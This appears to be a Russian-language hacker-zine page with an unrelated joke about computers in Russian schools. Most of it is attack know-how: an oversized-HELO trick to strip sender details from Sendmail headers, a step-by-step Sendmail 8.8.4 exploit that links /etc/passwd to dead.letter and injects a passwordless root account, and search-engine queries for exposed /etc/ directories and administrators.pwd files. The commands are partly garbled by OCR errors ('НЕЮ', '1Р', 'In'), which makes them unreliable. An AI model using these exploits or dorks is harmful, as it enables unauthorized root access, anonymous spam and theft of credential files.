Если вы планируете сделать что-то нехорошее, то лучше не делайте этого. Вас могут поймать. Лучше быть осторожным, чем глупым. Хакерское искусство — это баланс знания, осторожности и смелости. Безрассудство сюда не входит.
Вот краткое описание «дыры» в Sendmail (qmail), которую я недавно обнаружил. При почтовой бомардировке или отправке поддельных писем и спама наш долбанный sendmail обычно прикрепляет к исходящему сообщению такие атрибуты, как имя узла отправителя и его 1Р-адрес.
Можно легко определить отправителя по строке: «Received: from spammer (marc@math:university.edu [150.129.84.5])». Но я нашел небольшую «дыру», которая позволяет юзеру скрывать свою личность и посылать сообщения анонимно.
Вы можете повторить мой эксплоит, удлинив строку НЕЮ в несколько раз. 1024 В — локация отправителя и другая полезная информация будет удалена.
Вставка дополнительной длины в параметр HELO/EHLO либо деактивирует AllowBogusHELO, либо вызывает серьезные проблемы.
Гигантская «дыра» в Sendmail 8.8.4 (взято из hackersclub.com)
Этот эксплоит использует Sendmail версии 8.8.4 и требует, чтобы вы имели шелл-аккаунт на исследуемом сервере.
Эксплоит создает ссылку из /etc/passwd to /var/tmp/dead.letter. Напечатайте следующие команды:
In /etc/passwd /var/tmp/dead.letter
telnet target.host 25
mail from: nonexsistent@not.an.actual.host.com
rcpt to: nonexsistent@not.as.actual.host.com
data
lord::0:0:leet shit:/root:/bin/bash
Вы подключаетесь через Telnet к порту 23 и регистрируетесь как lord. Никакого пароля не требуется. Привилегии администратора.
Приезжают американцы в Россию по обмену педагогическим опытом и спрашивают у нашего Министра образования:
— Вы с какого возраста детей учите на компьютерах работать ?
Наш отвечает: «С первого класса!»
Американцы: «Ухты, а можно посмотреть?»
Приводят американцев в первый класс.
Те глядь, а там на партах стоят четыре компьютера. Учительница говорит:
— Дети, вы все прекрасно знаете, как называется этот прибор. Он называется…
Дети (хором):
— Персональный компьютер!
— Правильно. Этот прибор нам поможет научиться быстро считать. Петров, возьми один компьютер и поставь его на подоконник. Дети, а теперь кто мне скажет, сколько компьютеров осталось ?
Иногда поисковые машины типы Yahoo или Google могут делать для вас интересную работу. Например, если вы укажите в окне запроса Google: «Index of administrators.pwd» (без кавычек), то получите весьма интересные результаты.
А еще лучше напечатайте: «Index of /etc/». Как видите, здесь огромный простор для нашего воображения. Вы можете напечатать: «Index of /cgi-bin/» или «cgi-bin/etc». Хм! Кто бы мог подумать, что такое возможно!
Давайте, рассмотрим недокументированные возможности поисковых машин. Допустим, нам захотелось найти скрытые музыкальные файлы. Имеется множество серверов, которые бесплатно предлагают музыку. Но еще большее количество серверов скрывают такие файлы в своих глубинах.
Как добраться до них? Ответ прост: большинство FTP-серверов хранят файлы в директории ftproot. Введите в окно поиска: «ftproot» (без кавычек). Выберите из списка какую-нибудь ссылку.
Комментарии